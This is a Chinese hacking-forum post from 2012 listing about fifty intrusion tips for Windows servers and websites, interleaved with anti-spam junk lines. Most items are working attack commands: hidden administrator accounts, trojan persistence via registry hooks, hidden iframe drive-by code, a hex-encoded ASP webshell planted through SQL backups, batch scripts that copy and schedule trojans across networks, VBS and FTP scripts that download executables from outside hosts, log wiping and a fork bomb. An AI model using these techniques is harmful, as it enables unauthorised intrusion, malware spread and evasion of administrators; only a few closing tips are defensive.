中国网络渗透测试联盟
标题:
入侵渗透笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:13
标题:
入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
1 Z! m4 q- i; R3 Y- q
cacls C:\windows\system32 /G hqw20:R
. K0 u) ?/ \7 @0 d, @6 o8 K( e
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
$ _5 p1 N. [( r) t
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
+ u( r: O$ [( X4 P1 v( p6 }0 f
. c& O# K. n0 M
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
+ t( F( q$ w6 K% I
" F% c. u1 U4 Z; J6 ^& T
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
7 P# p7 }5 @4 ` }% B
+ @1 j4 r' M* I k8 x
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 l! L! b1 w4 x% P6 ~
5 z+ p0 F1 U0 H. R' x$ C
5、利用INF文件来修改注册表
: E$ |& d4 U, {4 c4 c
[Version]
! c9 r! ]; e# K' b3 S
Signature="$CHICAGO$"
% x3 I9 W$ D9 l- g2 C" {2 h
[Defaultinstall]
! C: K0 a4 Z S3 M8 L! A! y R
addREG=Ating
6 K& q. ^, w, i& Q- N! h
[Ating]
4 P2 r2 r0 o+ |# _3 j) y. q
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
( N o1 G/ O ~- m+ M ^
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
6 t9 U; d: ?* o, T3 `
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
3 S* P3 y9 Z. t! D: ^1 o
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
+ c7 k- D& K2 W8 s- Y% R5 v
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
9 ^" n% p, E' z- e2 x& r9 A& L
HKEY_CURRENT_CONFIG 简写为 HKCC
6 D* b6 K7 Z. {. o& N
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
7 s- O N0 d5 t4 x. z6 M7 \
"1"这里代表是写入或删除注册表键值中的具体数据
) ~) n- J* w5 ]1 K# X/ |* f5 `* c1 D
7 x. `- k g5 y9 X( U
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
7 _) o6 q# d% s/ G& J
多了一步就是在防火墙里添加个端口,然后导出其键值
8 l/ U9 o9 {) c$ f# F
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
# i* d& r8 ?/ Z: Z1 L$ B& q
# Q. U- R# ^& |( s
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
m- P* x8 s! \/ y# i
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
. e* w$ [+ I4 ^
( z% v) v! z3 o- _
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
/ F+ [. ~1 l3 ?7 h
% ~$ r1 k+ Y/ `6 [2 A% e# X3 e( ^
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
# F* Y0 E- I: H: A7 B5 @" C/ L
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
9 T6 r7 s$ H g, g, E N( n' U3 m. N
6 t5 i' C4 t; x7 r6 E7 N
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
9 h, b* V( S. z! F7 X4 p* O
) e5 F/ s ~4 w7 k. K
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
4 V( `$ w# l% q3 J8 j" s2 c: x! L( K
用法:xsniff –pass –hide –log pass.txt
: f/ O( g, T; I% F% [+ t7 D
z& w" i$ Q4 ^7 `4 l" i- I) y
12、google搜索的艺术
9 S, a( C1 m2 u' b, e: l
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
H O* j- T0 p
或“字符串的语法错误”可以找到很多sql注入漏洞。
+ ]1 y4 O- C- p+ W. q4 x" G
. {; q; ~3 H( Z' O( d/ M' m
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
) ?9 E# d* w- b! ~; Z4 h3 Y8 c; h( w1 d
$ ]8 g+ |' \+ B- R! m. U
14、cmd中输入 nc –vv –l –p 1987
- J: s& _* g5 t
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
# \5 I1 X2 f# i" U
! ]3 r7 e, e- n
15、制作T++木马,先写个ating.hta文件,内容为
; L. m9 {* g8 u3 y6 l
<script language="VBScript">
4 I* \! y- i9 G9 M2 N
set wshshell=createobject ("wscript.shell" )
/ S* h- T. e. \( f" B
a=wshshell.run("你马的名称",1)
7 A% a# B0 A7 A$ b* f
window.close
7 a9 K7 P/ p* g7 a% M5 a% w
</script>
8 U* _) v8 f2 ]0 t1 A9 ^
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
3 }* ~/ V1 x n. D
3 Q" q$ F1 p* i# Y
16、搜索栏里输入
* [; P2 t, \+ V
关键字%'and 1=1 and '%'='
2 S j9 @: m* e
关键字%'and 1=2 and '%'='
: ?( [$ F# \( x- m7 Y" x" n7 ?
比较不同处 可以作为注入的特征字符
- p/ w* k! R' |2 ]# g4 O
! l& X& M, i T* F% W5 R
17、挂马代码<html>
) w! Y4 W4 O7 G3 m1 R
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
" r% v, \) u& s5 p% r2 [+ D
</html>
+ q6 _ z r5 A0 k$ v
, ]4 Y) d( H( h$ z# y
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
, V* ` _$ A0 u4 d' A, R, s2 {
net localgroup administrators还是可以看出Guest是管理员来。
7 Y* ^+ l$ R [
" a- R! m7 m7 \/ A
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
4 u4 r) \9 }( J5 o
用法: 安装: instsrv.exe 服务名称 路径
* B% J) d/ R) W2 }
卸载: instsrv.exe 服务名称 REMOVE
$ U0 V7 Q% C) V( U
. {( c0 Q `+ l
" ?7 O# n( D' d$ G
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
/ ~. p& {; B/ i- m* w& O, R
不能注入时要第一时间想到%5c暴库。
2 W4 F& M" i9 f1 f( t* F' H
+ |% D& |; z2 m( I
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
( ]3 g- q! p$ r
: l# l. C. P/ U p4 w4 g! X7 ~) }
23、缺少xp_cmdshell时
* q% {, n, l. d$ k J8 C( X5 t5 B
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
3 d5 z! K1 |( [% a
假如恢复不成功,可以尝试直接加用户(针对开3389的)
2 w' i6 ]+ Z- I' H
declare @o int
3 ~" J. A6 [% d" A: A8 G; x/ {
exec sp_oacreate 'wscript.shell',@o out
. l" a( a- @: S g4 G2 A5 j7 U
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
5 _1 ?" ~, P" Y1 p/ g! L6 t
2 y& f$ L- N2 C V& e5 n
24.批量种植木马.bat
' o+ T/ h+ {, P
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
/ q+ f0 J4 \% a" s @3 C9 }
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
" |- N w. S7 z- v! t* T( x) Q9 k
扫描地址.txt里每个主机名一行 用\\开头
; r. S$ _1 J; ?3 e2 P
1 o6 K' P2 W+ ]1 {& }) g% H' N
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
. a7 b ? k5 q
0 v1 C5 L5 a( |. Q7 @- K8 K6 w, _
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
0 m6 S8 d3 P3 W
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
9 S. ?* |" U" n- p( s* s6 {
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
8 W# J$ j4 E! Z9 V$ c) f
5 ] U+ u- V1 u- Q' i) G
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
4 l4 S% \1 |# S5 |
然后用#clear logg和#clear line vty *删除日志
( [& v8 A6 S7 U+ H2 ^" X
1 S$ X9 ^7 x. h3 a. ^$ v
28、电脑坏了省去重新安装系统的方法
& b7 T# `* @# }0 r
纯dos下执行,
$ c3 i6 j! P; P4 ]) b3 ]
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
! O$ {1 i) Y$ b2 U
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
# {$ |! w. p8 Z3 U; C6 j) V6 o) e+ A
u! d1 l+ x; W' W( \
29、解决TCP/IP筛选 在注册表里有三处,分别是:
" M+ P3 i: M. p/ |
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
; ?' k# {2 N/ f) f( U" l( a4 ?" t
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
9 b" b4 b0 t2 U4 w6 m0 T; e N
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
/ G$ B$ i2 t2 Z: B! ~
分别用
1 R. K. Q3 @! ^7 S8 L/ M
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
6 H! s/ k( h+ f E7 i5 \+ N! e; m
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) P1 U$ B+ A, `- E, Z2 s @
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
8 X- w1 L, H! b8 V7 @+ w* H9 W' d
命令来导出注册表项
) A8 \# W& v% q3 L$ `# n! o8 z
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
4 \' W/ E0 z8 [6 o
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
3 ?* Q+ E, g; p o5 C& e! k8 z
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
0 E2 }4 w$ g) O7 t3 z
D. [+ V( O1 Q1 |( u3 }' ^
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
" U8 \' h% Q e4 S
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
: A) o/ C" c1 A# h- w5 D( K
0 D& c2 ~/ G& ^
31、全手工打造开3389工具
; L; u7 K( X) [7 { ^
打开记事本,编辑内容如下:
- e' B d& C5 e. Z5 |/ H9 l
echo [Components] > c:\sql
4 d5 m4 S2 d8 [ N6 {
echo TSEnable = on >> c:\sql
: Q8 z9 L6 I% n5 a$ v
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
+ N( F) ^/ G" [2 {1 O" h2 x6 y( b
编辑好后存为BAT文件,上传至肉鸡,执行
7 W# ]8 [& l4 r( o( j) O$ f
' g+ u Z. O1 a' p" t
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
( {8 ~0 V5 r# z0 F; T
N* J& b6 z6 I& `
33、让服务器重启
1 {. I5 \- O9 L5 d
写个bat死循环:
9 Y. K& ~3 w. W9 t5 A2 M( G
@echo off
" K9 K2 D; F& P& Z8 d: X
:loop1
/ E8 e9 i8 G" K( ~
cls
8 g* H( h1 u: {% [7 M+ w; Q
start cmd.exe
# c) i4 M1 h1 L2 M9 v
goto loop1
; G; |" |" A& ?: c/ J- i; Q
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
# K5 t: D! g- Q8 W4 H1 l
9 `4 y) y1 _6 |6 G s5 v
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
4 m+ ^1 G: Z8 {* V/ Q
@echo off
, S4 X2 c2 S) q7 x" Z+ j* C! E1 i
date /t >c:/3389.txt
q% p0 ?! r) J j; E# `
time /t >>c:/3389.txt
E7 a; g* X' F/ }6 I
attrib +s +h c:/3389.bat
- j' p! s# J8 H7 b- m( c9 A, \# H
attrib +s +h c:/3389.txt
- k; N$ u; r$ N! w# `( m- Q9 r
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
7 P; }1 J5 J* S: [' j# q7 u& d
并保存为3389.bat
, w* o' y, `/ y3 q
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
6 w) ~6 _" W$ d
0 H: f& k1 O" G
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
9 c' _4 `$ G2 ]* v8 U6 N
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
9 h( e" o, b' a/ C" [ ?5 q
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
/ @5 S5 Y, F6 ]; O x& p
* |4 s5 a4 c \1 S8 o
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
) }- `; h8 _( {, ?# ]9 W
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
7 ?7 d3 e7 ]0 L
echo 你的FTP账号 >>c:\1.bat //输入账号
0 i% G. c' C' \
echo 你的FTP密码 >>c:\1.bat //输入密码
# j, e3 z/ l, S
echo bin >>c:\1.bat //登入
& Y8 ?3 ?& F8 P& k& w! ?9 ?' a
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
, W' K z! r0 c& D/ E# t: O
echo bye >>c:\1.bat //退出
) U6 z1 w7 y! ?
然后执行ftp -s:c:\1.bat即可
; u' q# m1 E( U& P
+ p2 s; t) b! b' j, q1 I
37、修改注册表开3389两法
& H2 n5 A7 K1 E# c5 A+ C
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
* \% v) Q3 O) l+ v1 M6 ^2 f
echo Windows Registry Editor Version 5.00 >>3389.reg
9 z: T( z) ^! h/ J f
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
) G" Y! Q3 H* h
echo "Enabled"="0" >>3389.reg
; f3 M- F4 A2 `( d* v6 E& Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
) n+ G! u1 x# q6 G1 ]6 {2 G- ?$ n
NT\CurrentVersion\Winlogon] >>3389.reg
) j# i! Z9 e' y" X; {* o
echo "ShutdownWithoutLogon"="0" >>3389.reg
0 H0 l4 a% }- T) U z) w. G; p e" ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
' d& ?: C0 |% M: @3 u: U( Q5 A
>>3389.reg
7 ^/ b: C$ j v7 f
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
0 n0 _0 q+ Y; ~6 S o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
5 d5 H7 v# W( Z7 N4 G7 @$ `5 U
>>3389.reg
2 O' H9 c* `( ^4 s" I- T. j, j
echo "TSEnabled"=dword:00000001 >>3389.reg
$ E. I8 }; P( w; v6 S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
0 H, p0 X" [; H
echo "Start"=dword:00000002 >>3389.reg
6 m0 i% t/ ^' s O$ ?; L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
9 Y) l& d5 @& n, o
>>3389.reg
- t& Q3 l; @2 T" o, @1 L" k6 L
echo "Start"=dword:00000002 >>3389.reg
. ^5 B& r) }& I
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
$ n7 |% B& \+ h2 M; q. ~
echo "Hotkey"="1" >>3389.reg
) i' T+ J( U. M5 V4 @( F4 w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 V. j1 J8 e; u, l" d6 y* N( m8 U
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
) Y6 G( K) w! Y1 n8 Y i! W2 R P
echo "PortNumber"=dword:00000D3D >>3389.reg
0 ^7 n1 t0 F8 _/ I1 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 _) A" R4 R8 D5 F: P
Server\WinStations\RDP-Tcp] >>3389.reg
; N9 o7 _8 {" W# e$ ~2 c& t
echo "PortNumber"=dword:00000D3D >>3389.reg
5 m( |0 f. v! N+ n; G, x
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
" g7 C6 ^1 H; V! j
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
* T. j- W& z* M1 {3 O, g5 C, ]7 N
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
/ g4 [6 Q, d/ a2 U; u1 x
(2)winxp和win2003终端开启
4 i2 w+ J: h* Q: G
用以下ECHO代码写一个REG文件:
# \) e" @( K5 I8 M0 O) l) U
echo Windows Registry Editor Version 5.00>>3389.reg
' x h9 l* w e1 i3 e. |/ g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! d& {. L( D9 f7 K; s* W8 \
Server]>>3389.reg
! y! l2 C t0 B& e( W
echo "fDenyTSConnections"=dword:00000000>>3389.reg
k; D& t+ f/ c3 `' | R1 h ~& W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 n4 |* L- {: A& I$ f; B
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
. y; T, s6 t: k4 u9 D& l! x# U2 Y
echo "PortNumber"=dword:00000d3d>>3389.reg
6 L x* i0 V: S$ }# D2 o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* j1 | \3 N) H% p' u( j
Server\WinStations\RDP-Tcp]>>3389.reg
% [6 x d% B6 p2 U# g. T9 i7 G
echo "PortNumber"=dword:00000d3d>>3389.reg
& f9 x+ x9 q* K* I; ^
然后regedit /s 3389.reg del 3389.reg
# D! ~5 r6 s2 U3 N7 @& d/ T d
XP下不论开终端还是改终端端口都不需重启
s* X0 h: C. d y" j8 T, L: y/ g
* N) ~$ I# t6 D( a$ _% d8 p" ]( s" S
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
, r0 s5 D6 L; R1 N7 w9 Q, T
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
! }- r" e2 _4 i; O
( T2 f- R, T" S8 p H |
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
2 p* z, g' C& o6 o
(1)数据库文件名应复杂并要有特殊字符
5 ?8 l) r# b2 K& N
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
e3 c( F. P: S) y
将conn.asp文档中的
$ \# Y' [" E6 a0 f2 F. A0 ]* t
DBPath = Server.MapPath("数据库.mdb")
* c3 @1 B' U% n$ j* f* ~/ I
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
@- J) z# ?" \6 r- G' r0 L
( y- |! D) ]/ t/ ?) p/ f1 M# ^1 M! C
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
3 q2 S/ |6 O9 x7 p: ?& K
(3)不放在WEB目录里
$ C: `$ o( [1 g. A' a3 M3 K* z
* K# G( Z6 R5 u
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
9 ]$ n3 Z9 i5 v8 U7 S
可以写两个bat文件
5 l, |) |4 b5 a$ g2 D4 @
@echo off
" W$ G3 \% u T0 Z S. J8 }
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
7 F* F! E7 |- _
@del c:\winnt\system32\query.exe
! W$ H" ~* ]* q: ?, U
@del %SYSTEMROOT%\system32\dllcache\query.exe
8 q+ h$ v- x/ E1 m/ m6 p
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
9 n4 v6 M2 r+ i3 v R: K+ n
: z4 _+ F( O8 x8 n* K
@echo off
`. I+ v7 M" z6 }7 `
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
& P2 |. t# ~& M9 X! H/ O$ \- i
@del c:\winnt\system32\tsadmin.exe
4 @0 j* ^9 d! F6 a$ a
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
b, e6 }0 W) G! e" x0 @+ j$ T
$ G# g: T( z2 c8 D1 M7 W3 S! j% w1 O
41、映射对方盘符
6 `$ }0 Y* N, j4 m: G
telnet到他的机器上,
2 L+ c1 H& j" S2 q7 V7 J# W; ^* n& M
net share 查看有没有默认共享 如果没有,那么就接着运行
3 e4 d- m" w4 r
net share c$=c:
& i* ?9 t% }$ D: W f6 q
net share现在有c$
9 _- s+ v; f, W- I4 u5 d
在自己的机器上运行
p6 T2 V( p. n- V* ]3 w
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
. K$ ^# ^0 D; H; t& r( b
( X1 |5 C* x" i9 x1 v9 l
42、一些很有用的老知识
. s# C/ f4 b5 l2 ^$ O& z
type c:\boot.ini ( 查看系统版本 )
' e$ _% J; H8 H
net start (查看已经启动的服务)
- g z7 Q1 K# s! P/ E
query user ( 查看当前终端连接 )
) z* q/ C! J# ]( b" ?3 e
net user ( 查看当前用户 )
8 z+ W, q& k# i& Y, w4 m- F8 v
net user 用户 密码/add ( 建立账号 )
* ~( p! x# A# r$ @' g
net localgroup administrators 用户 /add (提升某用户为管理员)
. X- q( r' S" |8 t- W
ipconfig -all ( 查看IP什么的 )
$ H/ D0 q" \: T
netstat -an ( 查看当前网络状态 )
8 A0 W# j0 J* B+ `9 j& q
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
) t/ y, O2 s5 e8 V9 s: z: Q
克隆时Administrator对应1F4
; V% ~/ E h& {0 y$ E4 `& ~: P2 ~
guest对应1F5
" B! X. L2 C& R2 v2 o6 l
tsinternetuser对应3E8
9 r; S; K6 J4 y7 a4 H
7 ]: ^5 u2 J' ]
43、如果对方没开3389,但是装了Remote Administrator Service
# |* R* J, R( b; f1 l
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
+ U$ v0 w0 {( V- s1 f1 J u6 T
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
* q7 ~! Y& o3 q" V8 R
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
' v: f H8 ?2 c& d4 v" @" Y6 T9 W4 b
/ W/ a6 {* g( I% h- L) b4 f; V
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
9 b3 h' e3 P! H7 r4 g7 E5 |, A* w
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
' k& R3 l# x& T! t: w# b, ]4 ?
% Z7 j2 Y5 A8 u3 q8 p
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
& U; o2 L6 b! E7 R: o3 W& m1 L& x
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
& j# u8 v: {- y0 _) t7 R' D
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
5 L3 i1 P3 `2 q( k% \2 u
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
" e0 S o7 ~% x
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
! |0 X. G) \8 ?
(这是完整的一句话,其中没有换行符)
! a3 }6 ?/ I; O+ O* |, H
然后下载:
( K7 Q( U$ G; C- D# A `/ x
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
* ?% i( P8 L3 d1 c! {1 v- Z2 o. l4 ^( f9 X
- t# e# [& \+ C: a
46、一句话木马成功依赖于两个条件:
. b' O' E: o8 {" B6 Z- U p* ~
1、服务端没有禁止adodb.Stream或FSO组件
* T' F' ]& J/ ~- O
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
+ Q4 z0 R( p1 X( \4 W# l7 S
- ?7 L# ]6 |5 q6 ?4 R7 h2 f
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
- J3 i6 E. h5 T5 s* L7 W0 |
;alter database utsz set RECOVERY FULL--
1 a9 J% ?1 V, {% [6 B* a
;create table cmd (a image)--
) f. C) {7 v$ g, i* r8 x
;backup log utsz to disk = 'D:\cmd' with init--
/ O& U R _% X7 [# Z/ y5 i# Q
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
9 \( H4 ~+ v" o0 V7 Y
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
3 u: |8 ^" `" E( _
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
9 l& D/ B6 l; R! _
5 @. G- M3 m# p& _7 D' ~* V% Y2 {
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
# y' V6 ^3 C+ u
1 E( _( M. T+ `- a( a6 j7 g
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
' o/ X8 |8 @5 L8 K `- c
所有会话用 'all'。
0 ]( N4 t. N( v+ _- a5 W9 c
-s sessionid 列出会话的信息。
& D: |. a5 }& ?. P& f
-k sessionid 终止会话。
0 b4 I2 W: ~* ~3 F
-m sessionid 发送消息到会话。
# x$ _6 s3 ^; V( M' o. l" w' [$ t
- d6 j- k L8 q" k5 t
config 配置 telnet 服务器参数。
5 _8 n2 O+ I5 S$ a4 {
0 J" h5 o% a0 L0 [; {6 \. U
common_options 为:
2 v2 V; I2 _+ |6 v0 F, m
-u user 指定要使用其凭据的用户
( d( `. E) `$ S9 }0 Y
-p password 用户密码
0 E* u \7 [+ F% t; P# I
+ A1 g) k, \+ `# }2 Q$ B; X
config_options 为:
* d7 i" R0 B. N( u. c Y% b
dom = domain 设定用户的默认域
5 @0 L6 Y$ C U) Y+ B5 F" l! S$ m: x, o
ctrlakeymap = yes|no 设定 ALT 键的映射
( b6 o, k1 s+ {. C4 O2 z
timeout = hh:mm:ss 设定空闲会话超时值
& y$ l% B* x/ W0 F9 E
timeoutactive = yes|no 启用空闲会话。
* b8 [2 h9 t' f# j% J6 ~. G
maxfail = attempts 设定断开前失败的登录企图数。
: z- k" k$ E$ O- }( f( n
maxconn = connections 设定最大连接数。
5 n8 B2 c3 g) a% I+ A+ e
port = number 设定 telnet 端口。
9 q" X' Y- j0 U, D, x
sec = [+/-]NTLM [+/-]passwd
8 W1 m: P b) [$ Y% {
设定身份验证机构
4 r8 F3 ]; |' G4 @9 m/ a! i
fname = file 指定审计文件名。
; c1 s$ {! L" ~* D' e4 X" w
fsize = size 指定审计文件的最大尺寸(MB)。
5 I, q2 _2 ^! o: L L; n* O1 v( d
mode = console|stream 指定操作模式。
" e1 K7 v( Q' ?& \6 |; r
auditlocation = eventlog|file|both
! O1 I! t |" s2 A# x2 N( P
指定记录地点
) P8 I+ J7 i) ?. u
audit = [+/-]user [+/-]fail [+/-]admin
# d& H( l% q! [& i
# S: j2 v2 I6 ]+ a; r, P: o
49、例如:在IE上访问:
; J# M& C! N# y( q
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
% F5 G: z# ^( O9 B+ g! q. g) G
hack.txt里面的代码是:
+ Y* R) |# t) k5 |$ |
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
/ |# A/ K4 w) e" D0 a
把这个hack.txt发到你空间就可以了!
y) D* B# S2 u) y3 d
这个可以利用来做网马哦!
" I( D1 \1 z( S2 M* u7 x# p9 _% @- l% z
, W' m k. C0 p4 o
50、autorun的病毒可以通过手动限制!
# x# I* d, p. B/ q! I8 n# |" c
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
1 U# ]+ P" [/ X3 M# O9 `4 ?
2,打开盘符用右键打开!切忌双击盘符~
6 Z* w1 N; F8 u; M
